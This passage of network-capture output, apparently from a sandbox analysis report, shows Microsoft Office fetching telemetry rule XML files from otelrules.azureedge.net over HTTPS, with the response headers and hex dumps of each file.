                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                Session IDSource IPSource PortDestination IPDestination Port
                                125192.168.2.55009213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:12 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                ETag: "0x8DC582BDC13EFEF"
                                x-ms-request-id: f4a7b183-b01e-0098-27d5-43cead000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f784596886s2bhC1EWR743w000000167000000000hfx1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                126192.168.2.55009313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:12 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1425
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                ETag: "0x8DC582BE6BD89A1"
                                x-ms-request-id: 68e9c15b-c01e-002b-1eed-446e00000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968frfdmhC1EWRxxbw00000016bg0000000016kv
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                Session IDSource IPSource PortDestination IPDestination Port
                                127192.168.2.55009513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:12 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1415
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                ETag: "0x8DC582BE7C66E85"
                                x-ms-request-id: e7ccb915-001e-0014-50a1-425151000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968nxc96hC1EWRspw800000015ug00000000uquc
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session IDSource IPSource PortDestination IPDestination Port
                                128192.168.2.55009613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:12 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1378
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                ETag: "0x8DC582BDB813B3F"
                                x-ms-request-id: 5818dd1d-501e-0035-4638-40c923000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968jrjrxhC1EWRmmrs00000016d0000000005s8h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                129192.168.2.55009713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:14 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:14 GMT
                                Content-Type: text/xml
                                Content-Length: 1368
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE51CE7B3"
                                x-ms-request-id: af0b01d9-401e-0035-6c5f-4082d8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165214Z-174f7845968nxc96hC1EWRspw800000015zg0000000098f3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                Session IDSource IPSource PortDestination IPDestination Port
                                130192.168.2.55009813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:14 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1405
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                ETag: "0x8DC582BE89A8F82"
                                x-ms-request-id: 9546ee6f-d01e-0014-4f91-3fed58000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968xr5c2hC1EWRd0hn0000000r50000000001tmy
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                Session IDSource IPSource PortDestination IPDestination Port
                                131192.168.2.55010013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:15 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1407
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                ETag: "0x8DC582BE687B46A"
                                x-ms-request-id: 1402e90e-d01e-0049-106c-43e7dc000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968cdxdrhC1EWRg0en000000167g0000000051aq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                Session IDSource IPSource PortDestination IPDestination Port
                                132192.168.2.55009913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:15 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1415
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                ETag: "0x8DC582BDCE9703A"
                                x-ms-request-id: 13d7d736-e01e-00aa-3cf1-41ceda000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968xlwnmhC1EWR0sv800000016300000000077kf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session IDSource IPSource PortDestination IPDestination Port
                                133192.168.2.55010113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:15 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1378
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE584C214"
                                x-ms-request-id: a48bf5db-301e-001f-62e1-41aa3a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968swgbqhC1EWRmnb400000016d0000000008kqh
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                134192.168.2.55010213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:17 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1370
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                ETag: "0x8DC582BDE62E0AB"
                                x-ms-request-id: 3a28b270-401e-00ac-75b5-430a97000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165217Z-174f7845968vqt9xhC1EWRgten00000016ag000000004hd7
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                Session IDSource IPSource PortDestination IPDestination Port
                                135192.168.2.55010313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:17 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1397
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE156D2EE"
                                x-ms-request-id: 355539d4-e01e-0099-70f9-44da8a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165217Z-174f7845968glpgnhC1EWR7uec000000167g00000000ypbe
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                Session IDSource IPSource PortDestination IPDestination Port
                                136192.168.2.55010413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:17 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1360
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                ETag: "0x8DC582BEDC8193E"
                                x-ms-request-id: e09bbfae-501e-00a0-6a93-439d9f000000
                                x-ms-version: 2018-03-28
